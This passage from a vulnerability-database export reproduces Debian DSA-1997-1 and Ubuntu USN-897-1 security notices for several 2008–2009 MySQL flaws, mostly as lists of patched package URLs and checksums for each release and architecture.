(Little Endian))\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_mipsel.deb\n Size/MD5 checksum: 7775656 b773580d6eb7f3c270394ae8bd46eb85\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_mipsel.deb\n Size/MD5 checksum: 7721124 346332bf620a57af88f1495758b617fb\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_mipsel.deb\n Size/MD5 checksum: 1810420 82c04ce1c097c08c17fff616a4507aa6\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_mipsel.deb\n Size/MD5 checksum: 26332894 7dcba45bd26831928b7a7dc989ece59b\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_powerpc.deb\n Size/MD5 checksum: 1917890 a8181910ac284e74b82ac1f5bd0bf4af\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_powerpc.deb\n Size/MD5 checksum: 7615402 f57057aab219c296febad2b1dbd71292\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_powerpc.deb\n Size/MD5 checksum: 27312266 57d56f008e598595c89a87dd8fcfcd85\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_powerpc.deb\n Size/MD5 checksum: 8161690 96b710801fade82a7a0d2cb11f5b1357\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_s390.deb\n Size/MD5 checksum: 2031780 33ab4b2fb41707110c214ba7412e6b6d\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_s390.deb\n Size/MD5 checksum: 8227402 9af8be2781006662773b51cfaa348db6\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_s390.deb\n Size/MD5 checksum: 7698110 9e844e96ebac4a0256f219f7eb921b78\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_s390.deb\n Size/MD5 checksum: 28104580 4a0ea6408ca35135353c26e4504f9233\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_sparc.deb\n Size/MD5 checksum: 26813192 43180d48e10662a3f2f1bdef087a1c18\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_sparc.deb\n Size/MD5 checksum: 7137808 a00a7b49b780235f55d9dcb80bda12b0\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_sparc.deb\n Size/MD5 checksum: 7755776 22c7fd28be510233e2da5d61e56c8762\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_sparc.deb\n Size/MD5 checksum: 1869120 342fc5e565b995da31edcf71797bd40e\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2010-02-14T12:29:12", "published": "2010-02-14T12:29:12", "id": "DEBIAN:DSA-1997-1:38D19", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2010/msg00037.html", "title": "[SECURITY] [DSA-1997-1] New mysql-dfsg-5.0 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-09T00:24:47", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2446", "CVE-2008-4456", "CVE-2009-4030", "CVE-2008-4098", "CVE-2008-7247", "CVE-2009-4019", "CVE-2009-4484"], "description": "It was discovered that MySQL could be made to overwrite existing table \nfiles in the data directory. An authenticated user could use the DATA \nDIRECTORY and INDEX DIRECTORY options to possibly bypass privilege checks. \nThis update alters table creation behaviour by disallowing the use of the \nMySQL data directory in DATA DIRECTORY and INDEX DIRECTORY options. This \nissue only affected Ubuntu 8.10. (CVE-2008-4098)\n\nIt was discovered that MySQL contained a cross-site scripting vulnerability \nin the command-line client when the --html option is enabled. An attacker \ncould place arbitrary web script or html in a database cell, which would \nthen get placed in the html document output by the command-line tool. This \nissue only affected Ubuntu 6.06 LTS, 8.04 LTS, 8.10 and 9.04. \n(CVE-2008-4456)\n\nIt was discovered that MySQL could be made to overwrite existing table \nfiles in the data directory. An authenticated user could use symlinks \ncombined with the DATA DIRECTORY and INDEX DIRECTORY options to possibly \nbypass privilege checks. This issue only affected Ubuntu 9.10. \n(CVE-2008-7247)\n\nIt was discovered that MySQL contained multiple format string flaws when \nlogging database creation and deletion. An authenticated user could use \nspecially crafted database names to make MySQL crash, causing a denial of \nservice. This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 8.10 and 9.04. \n(CVE-2009-2446)\n\nIt was discovered that MySQL incorrectly handled errors when performing \ncertain SELECT statements, and did not preserve correct flags when \nperforming statements that use the GeomFromWKB function. An authenticated \nuser could exploit this to make MySQL crash, causing a denial of service. \n(CVE-2009-4019)\n\nIt was discovered that MySQL incorrectly checked symlinks when using the \nDATA DIRECTORY and INDEX DIRECTORY options. A local user could use symlinks \nto create tables that pointed to tables known to be created at a later \ntime, bypassing access restrictions. (CVE-2009-4030)\n\nIt was discovered that MySQL contained a buffer overflow when parsing \nssl certificates. A remote attacker could send crafted requests and cause a \ndenial of service or possibly execute arbitrary code. This issue did not \naffect Ubuntu 6.06 LTS and the default compiler options for affected \nreleases should reduce the vulnerability to a denial of service. In the \ndefault installation, attackers would also be isolated by the AppArmor \nMySQL profile. (CVE-2009-4484)", "edition": 5, "modified": "2010-02-10T00:00:00", "published": "2010-02-10T00:00:00", "id": "USN-897-1", "href": "https://ubuntu.com/security/notices/USN-897-1", "title": "MySQL vulnerabilities", "type": "ubuntu", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T18:15:11", "description": "No description provided by source.", "published": "2010-02-13T00:00:00", "title": "MySQL vulnerabilities", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4098", "CVE-2008-4456", "CVE-2008-7247", "CVE-2009-2446", "CVE-2009-4019", "CVE-2009-4030", "CVE-2009-4484"], "modified": "2010-02-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19118", "id": "SSV:19118", "sourceData": "\n ===========================================================\r\nUbuntu Security Notice USN-897-1 February 10, 2010\r\nmysql-dfsg-5.0, mysql-dfsg-5.1 vulnerabilities\r\nCVE-2008-4098, CVE-2008-4456, CVE-2008-7247, CVE-2009-2446,\r\nCVE-2009-4019, CVE-2009-4030, CVE-2009-4484\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 6.06 LTS\r\nUbuntu 8.04 LTS\r\nUbuntu 8.10\r\nUbuntu 9.04\r\nUbuntu 9.10\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 6.06 LTS:\r\n mysql-server-5.0 5.0.22-0ubuntu6.06.12\r\n\r\nUbuntu 8.04 LTS:\r\n mysql-server-5.0 5.0.51a-3ubuntu5.5\r\n\r\nUbuntu 8.10:\r\n mysql-server-5.0 5.0.67-0ubuntu6.1\r\n\r\nUbuntu 9.04:\r\n mysql-server-5.0 5.1.30really5.0.75-0ubuntu10.3\r\n\r\nUbuntu 9.10:\r\n mysql-server-5.1 5.1.37-1ubuntu5.1\r\n\r\nIn general, a standard system upgrade is sufficient to effect the\r\nnecessary changes.\r\n\r\nDetails follow:\r\n\r\nIt was discovered that MySQL could be made to overwrite existing table\r\nfiles in the data directory. An authenticated user could use the DATA\r\nDIRECTORY and INDEX DIRECTORY options to possibly bypass privilege checks.\r\nThis update alters table creation behaviour by disallowing the use of the\r\nMySQL data directory in DATA DIRECTORY and INDEX DIRECTORY options. This\r\nissue only affected Ubuntu 8.10. (CVE-2008-4098) \r\n\r\nIt was discovered that MySQL contained a cross-site scripting vulnerability\r\nin the command-line client when the --html option is enabled. An attacker\r\ncould place arbitrary web script or html in a database cell, which would\r\nthen get placed in the html document output by the command-line tool. This\r\nissue only affected Ubuntu 6.06 LTS, 8.04 LTS, 8.10 and 9.04.\r\n(CVE-2008-4456)\r\n\r\nIt was discovered that MySQL could be made to overwrite existing table\r\nfiles in the data directory. An authenticated user could use symlinks\r\ncombined with the DATA DIRECTORY and INDEX DIRECTORY options to possibly\r\nbypass privilege checks. This issue only affected Ubuntu 9.10.\r\n(CVE-2008-7247)\r\n\r\nIt was discovered that MySQL contained multiple format string flaws when\r\nlogging database creation and deletion. An authenticated user could use\r\nspecially crafted database names to make MySQL crash, causing a denial of\r\nservice. This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 8.10 and 9.04.\r\n(CVE-2009-2446)\r\n\r\nIt was discovered that MySQL incorrectly handled errors when performing\r\ncertain SELECT statements, and did not preserve correct flags when\r\nperforming statements that use the GeomFromWKB function. An authenticated\r\nuser could exploit this to make MySQL crash, causing a denial of service.\r\n(CVE-2009-4019)\r\n\r\nIt was discovered that MySQL incorrectly checked symlinks when using the\r\nDATA DIRECTORY and INDEX DIRECTORY options. A local user could use symlinks\r\nto create tables that pointed to tables known to be created at a later\r\ntime, bypassing access restrictions. (CVE-2009-4030)\r\n\r\nIt was discovered that MySQL contained a buffer overflow when parsing\r\nssl certificates. A remote attacker could send crafted requests and cause a\r\ndenial of service or possibly execute arbitrary code. This issue did not\r\naffect Ubuntu 6.06 LTS and the default compiler options for affected\r\nreleases should reduce the vulnerability to a denial of service. In the\r\ndefault installation, attackers would also be isolated by the AppArmor\r\nMySQL profile. (CVE-2009-4484)\r\n\r\n\r\nUpdated packages for Ubuntu 6.06 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22 \\\r\n-0ubuntu6.06.12.diff.gz Size/MD5: 167876 00d09bda2a9e6a8d09bb9b871987049f\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22 \\\r\n-0ubuntu6.06.12.dsc Size/MD5: 1125 a7e5e72f375a937a016791eb938b0c43\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22 \\\r\n.orig.tar.gz Size/MD5: 18446645 2b8f36364373461190126817ec872031\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client_5.0.22-0 \\\r\nubuntu6.06.12_all.deb Size/MD5: 39254 29bd1bf7821777bb0ff45362efaae9c1\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-common_5.0.22-0 \\\r\nubuntu6.06.12_all.deb Size/MD5: 41802 55fc2a62d0f6c1cb6d6d3ee486bf1dbe\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server_5.0.22-0 \\\r\nubuntu6.06.12_all.deb Size/MD5: 39260 9d590dbd861ae98c88273f254eeac160\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_ \\\r\n5.0.22-0ubuntu6.06.12_amd64.deb Size/MD5: 6730446 10c7d0a9787128bbbe1eb26675a7d657\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5 \\\r\n.0.22-0ubuntu6.06.12_amd64.deb Size/MD5: 1424244 b446087d5d5d6347cfbb18c702a8a58b\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0. \\\r\n22-0ubuntu6.06.12_amd64.deb Size/MD5: 6898198 2cc1f733f990a7952a940a48a39e43e4\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0. \\\r\n22-0ubuntu6.06.12_amd64.deb Size/MD5: 22493888 dda28be78a9efd6a58c3cd5a05271570\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_ \\\r\n5.0.22-0ubuntu6.06.12_i386.deb Size/MD5: 6143164 fa552022904e46d3d7d06bda09b6ed1b\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5 \\\r\n.0.22-0ubuntu6.06.12_i386.deb Size/MD5: 1384680 1ac135a8d8582014b642e07f0e43e7a2\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0. \\\r\n22-0ubuntu6.06.12_i386.deb Size/MD5: 6279786 438c8f54ffe6c48e67444b4f4fe9e831\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0. \\\r\n22-0ubuntu6.06.12_i386.deb Size/MD5: 21353338 aacc9a20e8a4dc73e54334af61e093d1\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_ \\\r\n5.0.22-0ubuntu6.06.12_powerpc.deb Size/MD5: 6887098 \\\r\n933d514a51e9bdbd71e1892c510d5972 \\\r\nhttp://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.2 \\\r\n2-0ubuntu6.06.12_powerpc.deb Size/MD5: 1464520 cba00b39363cd2c84cd241cef114c146\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0. \\\r\n22-0ubuntu6.06.12_powerpc.deb Size/MD5: 6945458 4d66c9c564888ed5083c5460d62571ff\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0. \\\r\n22-0ubuntu6.06.12_powerpc.deb Size/MD5: 22708438 f0df7d903d21e30015719606277c331e\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_ \\\r\n5.0.22-0ubuntu6.06.12_sparc.deb Size/MD5: 6435878 2fe1f669d28c49ecac247ff966da1d74\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5 \\\r\n.0.22-0ubuntu6.06.12_sparc.deb Size/MD5: 1436656 a4bc7daef42f56b4c7631979c1fb4205\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0. \\\r\n22-0ubuntu6.06.12_sparc.deb Size/MD5: 6546076 cf3c1b3a58c5c751e505039effd2736b\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0. \\\r\n22-0ubuntu6.06.12_sparc.deb Size/MD5: 21974626 0e5b525a96691d3846141872be033343\r\n\r\nUpdated packages for Ubuntu 8.04 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.51 \\\r\na-3ubuntu5.5.diff.gz Size/MD5: 339669 5d60913fc963e3e79d7359ad34e01d73\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.51 \\\r\na-3ubuntu5.5.dsc Size/MD5: 1431 550486d7eb0d9bb0a16d9b6354c5ce63\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.51 \\\r\na.orig.tar.gz Size/MD5: 17946664 6fae978908ad5eb790fa3f24f16dadba\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client_5.0.51a- \\\r\n3ubuntu5.5_all.deb Size/MD5: 52524 255aa521be7f73f8609f8ff34e2d9cb2\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-common_5.0.51a- \\\r\n3ubuntu5.5_all.deb Size/MD5: 60760 029a306a41330da1162d8a6271903ea7\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server_5.0.51a- \\\r\n3ubuntu5.5_all.deb Size/MD5: 54718 1c739e3d3ba80d59e84daa50bbc7b108\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_ \\\r\n5.0.51a-3ubuntu5.5_amd64.deb Size/MD5: 7595714 aa4e4d10ffaeb884b689e31a1cef78f6\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5 \\\r\n.0.51a-3ubuntu5.5_amd64.deb Size/MD5: 1878318 e6f3c214a9a9dd43c7544c9d483c6dc8\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0. \\\r\n51a-3ubuntu5.5_amd64.deb Size/MD5: 8243190 60fadf98f4a486a341d68e5fb64242f0\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0. \\\r\n51a-3ubuntu5.5_amd64.deb Size/MD5: 28019550 2def1acb4f58487fe46354c07697f70f\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_ \\\r\n5.0.51a-3ubuntu5.5_i386.deb Size/MD5: 7217088 a5c18f67da82686380e498164baf9eb8\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5 \\\r\n.0.51a-3ubuntu5.5_i386.deb Size/MD5: 1837214 75ed6085799e4c41404024e6b3b6cfb0\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0. \\\r\n51a-3ubuntu5.5_i386.deb Size/MD5: 7827620 12f85552fbbb64e2345e732732973824\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0. \\\r\n51a-3ubuntu5.5_i386.deb Size/MD5: 27429242 8f3a8be947c0fcceb832e6624e10b659\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-3u \\\r\nbuntu5.5_lpia.deb Size/MD5: 7161686 8597c58cf4965174975630dbb049485f\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-3ub \\\r\nuntu5.5_lpia.deb Size/MD5: 1827214 1aa581c6751818c4fe1f0ce6bfb18e6f\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-3ubunt \\\r\nu5.5_lpia.deb Size/MD5: 7841430 b289175e0013db05378e3f9cd427db65\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-3ubunt \\\r\nu5.5_lpia.deb Size/MD5: 27358930 45969231c1d332db54f738e36da39abe\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-3u \\\r\nbuntu5.5_powerpc.deb Size/MD5: 7588138 4f767c278a4ba51b5083fd9ae4374325\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-3ub \\\r\nuntu5.5_powerpc.deb Size/MD5: 1916056 d82c00070c1c0d9f4a58a7f1977eea62\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-3ubunt \\\r\nu5.5_powerpc.deb Size/MD5: 8242628 8482aeb1c190500043f9b9b74ca3328c\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-3ubunt \\\r\nu5.5_powerpc.deb Size/MD5: 28345180 75de60d6fac901c43e1c032b4c4ccdc8\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-3u \\\r\nbuntu5.5_sparc.deb Size/MD5: 7200904 de677b3281d476c8c2ab38858f055f51\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-3ub \\\r\nuntu5.5_sparc.deb Size/MD5: 1846732 27a62502a5dd87bbcdf917391ab3583f\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-3ubunt \\\r\nu5.5_sparc.deb Size/MD5: 7832466 39ee953d7ac9b1a3bb13a3ba6976a062\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-3ubunt \\\r\nu5.5_sparc.deb Size/MD5: 27644158 62d3802f26217949a10152c120491b92\r\n\r\nUpdated packages for Ubuntu 8.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.67 \\\r\n-0ubuntu6.1.diff.gz Size/MD5: 336351 a373771dfabdc93b4171d9478a36ea5a\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.67 \\\r\n-0ubuntu6.1.dsc Size/MD5: 1845 c2756cc5a230d0eeab3c766031df39c8\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.67 \\\r\n.orig.tar.gz Size/MD5: 18190615 3c868d130a0edf4c9dd1da64fe141975\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client_5.0.67-0 \\\r\nubuntu6.1_all.deb Size/MD5: 53318 1910e22b6ab49e474b2173fe3355218c\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-common_5.0.67-0 \\\r\nubuntu6.1_all.deb Size/MD5: 61272 2da508710dafbd9a9b562cf8887f4b6b\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server_5.0.67-0 \\\r\nubuntu6.1_all.deb Size/MD5: 55508 6abad70a6b59c6a682aadb36449ca324\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_ \\\r\n5.0.67-0ubuntu6.1_amd64.deb Size/MD5: 7683166 3395c05fb294228283085ba373266e81\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5 \\\r\n.0.67-0ubuntu6.1_amd64.deb Size/MD5: 1877112 e9aa4cb777e27bcc82edaa3654313b47\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0. \\\r\n67-0ubuntu6.1_amd64.deb Size/MD5: 8282998 739613274c6831eb3e2a1b3838f2defb\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0. \\\r\n67-0ubuntu6.1_amd64.deb Size/MD5: 27449918 7bbfd1737acd0316f7fc98371b67959e\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_ \\\r\n5.0.67-0ubuntu6.1_i386.deb Size/MD5: 7295910 c4a4b4ffa0e6d27b45c06bb2f82793b6\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5 \\\r\n.0.67-0ubuntu6.1_i386.deb Size/MD5: 1841126 9d2f4ec8c855eaf53097fc25d3b4ebdd\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0. \\\r\n67-0ubuntu6.1_i386.deb Size/MD5: 7882140 0628692852a8224ebedb2fc6c93ab0dc\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0. \\\r\n67-0ubuntu6.1_i386.deb Size/MD5: 26845390 f6837acba0ce00d6f47c7286873d9555\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.67-0ub \\\r\nuntu6.1_lpia.deb Size/MD5: 7238848 8453be364e88a877e637d20d76277e1c\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.67-0ubu \\\r\nntu6.1_lpia.deb Size/MD5: 1829966 efd8e067d658633086a22b689c18a0fb\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.67-0ubuntu \\\r\n6.1_lpia.deb Size/MD5: 7876470 c3321d38368f6f3cfc1b2f0943571c9d\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.67-0ubuntu \\\r\n6.1_lpia.deb Size/MD5: 26771148 c0f9db9c9e5fcc35ab31961486466397\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.67-0ub \\\r\nuntu6.1_powerpc.deb Size/MD5: 7698848 a770ab25d31340131a7b6b00ae246654\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.67-0ubu \\\r\nntu6.1_powerpc.deb Size/MD5: 1886412 f4e50087f47afa8b2ff26b780f83cd73\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.67-0ubuntu \\\r\n6.1_powerpc.deb Size/MD5: 8233508 0ce915b511dfab829cd19cb5a13c199b\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.67-0ubuntu \\\r\n6.1_powerpc.deb Size/MD5: 27424328 fa89227e20fc7ca82539bbdbcdc47a0b\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.67-0ub \\\r\nuntu6.1_sparc.deb Size/MD5: 7216146 d35e071761c46fe5925fb899bc928bc7\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.67-0ubu \\\r\nntu6.1_sparc.deb Size/MD5: 1850628 9920dfdbcbb1bae208a3cf98ea939dc3\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.67-0ubuntu \\\r\n6.1_sparc.deb Size/MD5: 7843558 bc0ca5889cc4e548dfffdc36349c39d8\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.67-0ubuntu \\\r\n6.1_sparc.deb Size/MD5: 26978336 39ead5bdd637f37ecab2cdc9a80ff0f4\r\n\r\nUpdated packages for Ubuntu 9.04:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.1.30 \\\r\nreally5.0.75-0ubuntu10.3.diff.gz Size/MD5: 352203 0ec231929483bcf16d96cdb9b0f58c9f\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.1.30 \\\r\nreally5.0.75-0ubuntu10.3.dsc Size/MD5: 1956 786a69531e3997a24963c2289c2f99a4\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.1.30 \\\r\nreally5.0.75.orig.tar.gz Size/MD5: 18275990 81153cfb1108f858446a69c6371fd9f3\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client_5.1.30re \\\r\nally5.0.75-0ubuntu10.3_all.deb Size/MD5: 55530 065b5eb033ab08fc571597578111c6bd\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-common_5.1.30re \\\r\nally5.0.75-0ubuntu10.3_all.deb Size/MD5: 63400 526faed8d9ba168839a9d84aad4fc9d6\r\n 